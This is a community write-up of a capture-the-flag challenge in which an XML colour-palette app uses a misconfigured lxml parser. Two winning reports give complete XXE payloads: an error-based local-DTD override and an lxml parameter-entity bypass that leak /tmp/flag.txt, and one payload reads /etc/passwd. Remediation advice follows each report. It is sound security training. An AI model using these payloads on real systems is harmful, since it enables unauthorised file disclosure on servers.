The Dojo challenge, Hex Color Palette, required participants to exploit an XXE (XML External Entity) vulnerability in order to trigger a file disclosure.
By crafting a malicious XML payload, they had to trick the parser into leaking the contents of a sensitive local file - specifically /tmp/flag.txt.
💡 Want to create your own monthly Dojo challenge and win a contributor award? Send us a message on Twitter!
The winners
Congrats to 0necloud, Cryptocat and 3c4d for the best write-ups! 🥳
The swag is on its way!
Subscribe to our Twitter and/or LinkedIn feeds to be notified of upcoming challenges.
Read on to find out how one of the winners managed to solve the challenge.
OVERALL BEST WRITE-UPS
This time, things were a little different, and some context is needed.
The challenge was created by me (@pwnwithlove), and while preparing it for release last month I realised that the original PoC no longer worked as expected.
After some investigation, I discovered that the issue was caused by an update to the Python lxml library.
In particular, a bug report from Anatoly Katyushin (heart1ess) revealed that payloads relying on parameter entities had worked reliably until this update, including in scenarios involving DTD injection and indirect file disclosure. However, changes in the underlying libxml2 library meant that lxml now blocked such payloads.
This change explains why the challenge suddenly stopped working: although the intended solution remained valid, the parser no longer processed parameter entities the way it used to, effectively breaking the error-based XXE vector the intended solution relied on.
To address this, we added a feature to Dojo that allows us to use the previous version of lxml when creating challenges, and I left the challenge itself unchanged.
Instead, I have decided to publish two separate reports for this community write-up: one detailing the intended PoC before the lxml update, and another showcasing the exploitation technique based on the discovery by Anatoly Katyushin (heart1ess)!
----- START OF 0necloud's REPORT -----
Description
This challenge revolves around a Python web application that renders user-supplied XML data through a templated HTML interface. The application uses the lxml library to parse XML files and extract hexadecimal colour codes to populate a front-end colour palette. However, the XML parser is configured to allow external Document Type Definitions (DTDs) and resolve entities, which opens the door to an XML External Entity (XXE) injection vulnerability.
Due to insufficient input validation and an insecure parser configuration, an attacker is able to inject arbitrary entity declarations, thereby allowing them to manipulate the server into disclosing files stored on it.
Exploitation
To identify potential vulnerabilities within an application, analysing the source code is an effective approach as it reveals insecure coding practices, such as improper input validation or the misuse of certain libraries. In this scenario, we are presented with a web application that accepts user input, which is then parsed by the program, potentially influencing the contents returned to the user.
Code Analysis
The first step in performing our taint tracking is to examine how our input is being handled by the program. In this scenario, a Web Application Firewall URL-encodes the user input before it reaches the web server.
data = unquote(USER_INPUT)
try:
    parsed_text, colors = promptFromXML(data)
except Exception as e:
    parsed_text = f"Error : {str(e)}"
    colors = []
print(template.render(output=parsed_text, colors=colors, image=None))
Our user input is first decoded using the unquote() function, which restores its original form (our raw input), before being passed to promptFromXML(), which in turn hands it to the parse_palette() function. The result of XML parsing, or any error that occurs, is echoed back to the user in a templated HTML response. This hints that our payload could manipulate the contents of error messages, which often tend to be verbose.
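The encode/decode round trip can be sketched with the standard library. This is only an illustration: it assumes the WAF behaves like urllib.parse.quote, which the challenge source does not confirm, and sample_payload is a hypothetical input.

```python
from urllib.parse import quote, unquote

# Hypothetical input; any XML document would do.
sample_payload = '<!DOCTYPE colors [<!ENTITY % a "x">]><colors/>'

# Assumption: the WAF percent-encodes every reserved character.
encoded = quote(sample_payload, safe="")

# The challenge code calls unquote(), which restores the raw XML.
decoded = unquote(encoded)

print(encoded)
print(decoded == sample_payload)
```

Because decoding restores the input byte for byte, the URL-encoding step gives no protection against XML-level payloads.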
def parse_palette(xml_data):
    parser = etree.XMLParser(load_dtd=True, resolve_entities=True)
    tree = etree.parse(io.StringIO(xml_data), parser)
    root = tree.getroot()
    colors = set()
    # Only parsing hex color
    for elem in root.iter():
        if elem.text and re.match(r"^#(?:[0-9a-fA-F]{3,6})$", elem.text.strip()):
            colors.add(elem.text.strip().lower())
    return list(colors)
The parse_palette() function is where the bulk of the data processing happens. There are a few key points that can be noted regarding the function's implementation:
- load_dtd=True: allows the XML parser to load external DTDs
- resolve_entities=True: enables the expansion of external entities
- There is no sanitisation of the xml_data parameter
In the setup code, we can observe that there is a DTD file located at /tmp/xml/config.dtd:
with open("xml/config.dtd", 'w') as f:
    f.write('''
<!ENTITY % dtd "<!ELEMENT config (#PCDATA)>">
%config_hex;
''')
Note the reference to an undefined entity %config_hex.
Conclusions drawn from Code Analysis
From the configuration of lxml.etree.XMLParser, in which both load_dtd and resolve_entities were set to True, we can deduce that the application will:
1. Load external DTDs from file paths
2. Expand nested parameter entities
3. Attempt to resolve file paths provided within entity values
From the DTD file stored at /tmp/xml/config.dtd, which contains an undefined entity %config_hex, we can deduce the possibility of overriding this entity with arbitrary ones, which will be subsequently loaded by the parser. Based on this idea, we can slowly piece together a payload:
To begin with, we need to load the local DTD at /tmp/xml/config.dtd:
<!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd">
Next, we need to override %config_hex, which could have nested parameter entities that would be expanded via the parser's resolve_entities=True configuration. We need to include the following:
<!ENTITY % flag SYSTEM "file:///tmp/flag.txt">
This reads the contents of /tmp/flag.txt into the %flag entity.
<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///aaa/%flag;'>">
This creates a nested entity %error that references a non-existent file path (aaa) with the flag appended to it.
%eval;
This expands %eval, which causes the parser to resolve %error.
Finally, we just need the parser to load /tmp/xml/config.dtd, which will then encounter %config_hex (which we have overridden).
%local_dtd;
The parser will then read the contents of /tmp/flag.txt into %flag and, within %error, construct a path file:///aaa/{FLAG_CONTENT}. Since the filepath aaa/{FLAG_CONTENT} most probably does not exist, an error containing the resolved path will be thrown, and the resolved path will be returned as part of the error message (hopefully).
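The principle behind this step, an error message that echoes an attacker-influenced path, can be illustrated without an XML parser. The sketch below is a plain Python analogy and not lxml's actual behaviour; read_resource, handle_request and the secret value are hypothetical.

```python
def read_resource(path: str) -> str:
    """Stand-in for a parser fetching an external resource from disk."""
    with open(path, encoding="utf-8") as handle:
        return handle.read()


def handle_request(path: str) -> str:
    """Mirror the challenge wrapper: echo the exception text to the user."""
    try:
        return read_resource(path)
    except Exception as exc:
        return f"Error : {exc}"


# Hypothetical secret standing in for the contents of /tmp/flag.txt.
secret = "FLAG{demo_value}"

# The secret is appended to a directory that is assumed not to exist.
response = handle_request(f"/aaa/{secret}")
print(response)
```

The lookup fails, but the failure message repeats the full path, so the secret reaches the response anyway.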
Proof of Concept
Before we merge everything together, we need to note that some characters need to be replaced with their Unicode hex character references to bypass parser restrictions and prevent premature expansions during entity parsing.
- % -> &#x25;
- & -> &#x26;
- ' -> &#x27;
Double-encoding is also used to delay expansions. For example, &#x26;#x25; -> &#x25; -> %.
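The layered decoding can be mimicked in Python. This is a sketch only: html.unescape is used here as a stand-in for the way an XML parser resolves character references each time an entity value is read, and encoded_line is an illustrative declaration rather than a confirmed copy of the submitted payload.

```python
import html


def peel(value: str) -> str:
    """Resolve one layer of character references (stand-in for the XML parser)."""
    return html.unescape(value)


# A doubly encoded percent sign needs two passes before it becomes active.
double_encoded = "&#x26;#x25;"
after_first_pass = peel(double_encoded)
after_second_pass = peel(after_first_pass)

# Illustrative declaration as it might sit inside an outer entity value.
encoded_line = (
    '<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error '
    'SYSTEM &#x27;file:///aaa/&#x25;flag;&#x27;>">'
)
decoded_line = peel(encoded_line)

print(after_first_pass, after_second_pass)
print(decoded_line)
```

After one pass the outer declaration is usable while the inner percent sign is still a reference, which is what postpones the declaration of the nested entity until the next expansion.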
PAYLOAD:
<!DOCTYPE colors [
<!ENTITY % local_dtd SYSTEM "file:///tmp/xml/config.dtd">
<!ENTITY % config_hex '
<!ENTITY &#x25; flag SYSTEM "file:///tmp/flag.txt">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///aaa/&#x25;flag;&#x27;>">&#x25;eval;'>
%local_dtd;
]>
FLAG: FLAG{3rr0r_B4s3d_XX3_w1th_Sw4G}
Risk
This vulnerability presents a serious risk as it allows an attacker to read files on the server, leading to a loss of confidentiality. For example, the same technique can be used to leak the contents of /etc/passwd.
Remediation
To remediate this vulnerability, the load_dtd and resolve_entities options of lxml.etree.XMLParser should be set to False to prevent the loading of DTDs and the expansion of entities.
Input validation and sanitisation should be incorporated before the user input is processed by the parse_palette() function, so that input containing blacklisted characters and keywords (e.g. <!DOCTYPE, SYSTEM) is rejected before it is parsed.
Additionally, error messages returned to the user should avoid including the XML parser's error messages as these could unintentionally leak file paths, stack traces, and in this scenario, the contents of arbitrary files.
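The input filtering and error handling recommendations could look roughly like the sketch below. It is a hedged illustration, not the challenge's code: reject_dtd, handle_upload and the message strings are hypothetical, and it assumes the palette feature never needs a DTD. A keyword filter of this kind is only a second line of defence; the parser options remain the primary fix.

```python
import re

# Assumption: legitimate palettes never need a DTD, so any declaration is refused.
FORBIDDEN_MARKUP = re.compile(r"<!(?:DOCTYPE|ENTITY)", re.IGNORECASE)


def reject_dtd(xml_text: str) -> str:
    """Raise ValueError when the input carries DTD or entity declarations."""
    if FORBIDDEN_MARKUP.search(xml_text):
        raise ValueError("DTD declarations are not allowed")
    return xml_text


def handle_upload(xml_text: str, parse):
    """Run `parse` on vetted input and keep exception details away from the user."""
    try:
        return "Palette successfully extracted", parse(reject_dtd(xml_text))
    except Exception:
        # Details belong in server-side logs, not in the HTML response.
        return "Error : the XML document could not be processed", []
```

Here parse stands for whatever function performs the actual XML parsing, for example a hardened version of parse_palette().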
----- END OF 0necloud's REPORT -----
As explained earlier, this approach no longer works with the current version of lxml.
Even with resolve_entities=True, it's no longer possible to trigger an XXE using parameter entities - which were previously exploitable regardless of this setting.
Now it's time to take a closer look at the behavior we discussed earlier - illustrated through CryptoCat's report.
----- START OF Crypto-Cat's REPORT -----
Description
With this application, you can now display your own hex color palettes and unleash your inner UX designer! Simply upload your own XML files to generate custom palettes. Can you find the flag?
The flag can be found in /tmp/flag.txt
Solution
In this writeup, we'll review the latest YesWeHack Dojo challenge, created by Pwnii.
Source code review
setup.py
Starting with the server setup code, we see that the flag is placed in the /tmp directory, along with the templates and xml directories.
os.chdir("/tmp/")
os.makedirs("templates", exist_ok=True)
os.makedirs("xml", exist_ok=True)
with open("flag.txt", "w") as f:
    f.write(flag)
There's a sample XML file and DTD.
with open("xml/sample.xml", 'w') as f:
    f.write('''
<!DOCTYPE colors [
<!ELEMENT colors (color*)>
<!ELEMENT color (#PCDATA)>
]>
<colors>
<color>#FF5733</color>
<color>#1E3A8A</color>
<color>#2ECC71</color>
<color>#F1C40F</color>
<color>#8E44AD</color>
<color>#2C3E50</color>
<color>#FFC0CB</color>
<color>#00FFFF</color>
</colors>
''')
with open("xml/config.dtd", 'w') as f:
    f.write('''
<!ENTITY % dtd "<!ELEMENT config (#PCDATA)>">
%config_hex;
''')
An index.tpl file is generated; I'll skip most of the CSS/HTML, which does not seem relevant.
<div class="content">
    <h2>Extracted Color Palette</h2>
    <p class="debug">{{ output }}</p>
    <div class="palette">
        {% if colors %} {% for color in colors %}
        <div class="color-box" style="background: {{ color }};">{{ color }}</div>
        {% endfor %} {% else %}
        <p class="debug">No colors detected.</p>
        {% endif %}
    </div>
</div>
challenge.py
Now onto the challenge code. It imports jinja2 and lxml, which should make us think of SSTI and/or XXE vulnerabilities. It specifically loads version 5.3.2 of lxml, so checking whether it's the latest version or has known vulnerabilities should be added to our TODO list.
from jinja2 import Environment, FileSystemLoader
lxml = import_v("lxml", "5.3.2")
from lxml import etree
Next, the template is loaded. The autoescape option will prevent XSS by escaping HTML variables.
template = Environment(
    autoescape=True,
    loader=FileSystemLoader('/tmp/templates'),
).get_template('index.tpl')
A parse_palette function is declared. The first thing to note is its susceptibility to XXE attacks:
- load_dtd=True: allows loading external/internal DTDs.
- resolve_entities=True: allows expanding general and parameter entities.
def parse_palette(xml_data):
    parser = etree.XMLParser(load_dtd=True, resolve_entities=True)
    tree = etree.parse(io.StringIO(xml_data), parser)
    root = tree.getroot()
    colors = set()
    # Only parsing hex color
    for elem in root.iter():
        if elem.text and re.match(r"^#(?:[0-9a-fA-F]{3,6})$", elem.text.strip()):
            colors.add(elem.text.strip().lower())
    return list(colors)
However, a regex is applied to the text of each XML element to ensure it matches a hex colour code format. It must start with a #, followed by 3-6 hex characters, e.g. #1337 or #420420.
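To see which values survive this filter, the pattern from parse_palette can be tried against a few strings. The candidate list below is made up for illustration.

```python
import re

# Same pattern as in parse_palette().
HEX_COLOUR = re.compile(r"^#(?:[0-9a-fA-F]{3,6})$")

# Hypothetical test values, including some that should be rejected.
candidates = ["#FFF", "#1337", "#12345", "#420420", "#1234567", "FF5733", "#GGGGGG", " #abc "]

# parse_palette() strips surrounding whitespace before matching.
accepted = [value for value in candidates if HEX_COLOUR.match(value.strip())]
print(accepted)

# A flag-shaped string can never pass as a colour.
print(bool(HEX_COLOUR.match("FLAG{demo}")))
```

Since anything resembling a flag is discarded by the filter, file contents cannot simply be rendered in the palette.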
There's one more function: promptFromXML. It simply takes a string and passes it to the parse_palette function we just looked at.
def promptFromXML(s: str):
    if not s:
        return "No XML data received.", []
    return "Pallet successfully extracted", parse_palette(s)
Finally, the script ties it all together. It takes our user input (note this is URL-encoded by the WAF, hence the unquote) and passes it to the promptFromXML function. The parsed colours will be returned and then rendered using template.render.
data = unquote("USER_INPUT_GOES_HERE")
try:
    parsed_text, colors = promptFromXML(data)
except Exception as e:
    parsed_text = f"Error : {str(e)}"
    colors = []
print(template.render(output=parsed_text, colors=colors, image=None))
Testing functionality
The setup.py code provided a sample XML file. It's a good idea to test it first, just to visualise the intended functionality of the app.
<!DOCTYPE colors [
<!ELEMENT colors (color*)>
<!ELEMENT color (#PCDATA)>
]>
<colors>
<color>#1337</color>
<color>#420420</color>
</colors>
The colours are "successfully extracted" from our XML input and rendered in the template.
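The same extraction can be reproduced offline. The sketch below swaps lxml for the standard library's xml.etree.ElementTree so that it runs without extra packages; it therefore says nothing about lxml's entity handling, and extract_colours is a hypothetical name.

```python
import re
import xml.etree.ElementTree as ET

SAMPLE = """<!DOCTYPE colors [
<!ELEMENT colors (color*)>
<!ELEMENT color (#PCDATA)>
]>
<colors>
<color>#1337</color>
<color>#420420</color>
</colors>"""


def extract_colours(xml_text: str) -> list:
    """Walk every element and keep text that looks like a hex colour."""
    root = ET.fromstring(xml_text)
    found = set()
    for elem in root.iter():
        text = (elem.text or "").strip()
        if re.match(r"^#(?:[0-9a-fA-F]{3,6})$", text):
            found.add(text.lower())
    # Sorted only to make the output deterministic.
    return sorted(found)


print(extract_colours(SAMPLE))
```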
If we can exploit an XXE vulnerability to read flag.txt, we'll need to either:
- Somehow render the contents as colour codes
- Trigger an exception that leaks the contents via an error
XXE in lxml library
Remember when we reviewed the source code and made a note to check for known vulnerabilities in the lxml library? Well, version 5.4.0 was released ~6 weeks ago. Why wouldn't Pwnii include the latest version? 🧐
Let's check out the "bugs fixed" section in the release notes.
- LP#2107279: Binary wheels use libxml2 2.13.8 and libxslt 1.1.43 to resolve several CVEs.
- (Binary wheels for Windows continue to use a patched libxml2 2.11.9 and libxslt 1.1.39.)
- Issue found by Anatoly Katyushin, see https://bugs.launchpad.net/lxml/+bug/2107279
Reviewing the link reveals some key information about versions 5.0.0 through 5.3.2.
- lxml lib from 5.0.0 restricts XXE parsing and requires resolve_entities to disable the restriction
However..
- libxml doesn't restrict Parameter Entities, that leads to XXE:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE msg [
<!ENTITY % a '
<!ENTITY % file SYSTEM "/etc/passwd">
<!ENTITY % b "<!ENTITY c '%file;'>">
'>
%a;
%b;
]>
<msg>&c;</msg>
The challenge meets both conditions:
- Using lxml < 5.4.0
- resolve_entities is set to True
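The version condition can be checked with a small helper. This is a rough sketch: in_reported_range is a hypothetical function, it only understands plain numeric versions such as 5.3.2, and it encodes the range named in the bug report (5.0.0 up to, but not including, 5.4.0). Releases outside that range are simply out of the report's scope, which does not make them safe, and the bundled libxml2 version is what ultimately matters.

```python
def parse_version(version: str) -> tuple:
    """Turn '5.3.2' into (5, 3, 2); pre-release suffixes are not supported."""
    return tuple(int(part) for part in version.split(".")[:3])


def in_reported_range(version: str) -> bool:
    """True when the lxml version falls in the range described by the bug report."""
    return (5, 0, 0) <= parse_version(version) < (5, 4, 0)


for candidate in ("4.9.4", "5.3.2", "5.4.0"):
    print(candidate, in_reported_range(candidate))
```

On a real system the installed version string could be obtained with importlib.metadata.version("lxml").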
Error-based data exfiltration
Can we do something similar? Let's try and swap out the values.
<!DOCTYPE colors [
<!ENTITY % a '
<!ENTITY % file SYSTEM "file:///tmp/flag.txt">
<!ENTITY % b "<!ENTITY c SYSTEM 'meow://%file;'>">
'>
%a;
%b;
]>
<colors><color>&c;</color></colors>
1. %file; reads /tmp/flag.txt (still allowed for parameter entities).
2. %b; creates a general entity c whose SYSTEM URI becomes meow://<contents-of-flag.txt>.
3. When the parser meets &c; it tries to fetch that URI but fails and raises an error (apparently meow is not a real protocol).
4. The wrapper catches the exception and prints it: Error : Invalid URI: meow://FLAG{.*}.
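When scripting the attack, the flag can be pulled out of the rendered error with a regular expression. The sketch below assumes the response text follows the format shown in step 4; extract_flag and the sample string are hypothetical.

```python
import re

# Assumption: flags follow the FLAG{...} convention used in this challenge.
FLAG_PATTERN = re.compile(r"FLAG\{[^}]*\}")


def extract_flag(page_text: str):
    """Return the first FLAG{...} token in the response, or None."""
    match = FLAG_PATTERN.search(page_text)
    return match.group(0) if match else None


sample_output = "Error : Invalid URI: meow://FLAG{example_only}"
print(extract_flag(sample_output))
```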
It worked! We get the flag: FLAG{3rr0r_B4s3d_XX3_w1th_Sw4G}
Remediation
- Upgrade to lxml >= 5.4.0.
- Disable load_dtd, or at least resolve_entities, when you do not expect complex DTDs.
- Sanity-check and fully whitelist incoming XML before feeding it to a parser.
Summary (TLDR)
In this challenge, we're given a colour palette viewer that parses XML files using an outdated version of lxml. Turns out, it's vulnerable to XXE. With both load_dtd and resolve_entities enabled, and version 5.3.2 in play, we can pull off a parameter entity injection to leak the contents of /tmp/flag.txt. Since the parser throws an error on weird URIs, we abuse that to leak the flag through a debug message. Classic error-based XXE, but with a nice UX-themed twist.
----- END OF Cryptocat's REPORT -----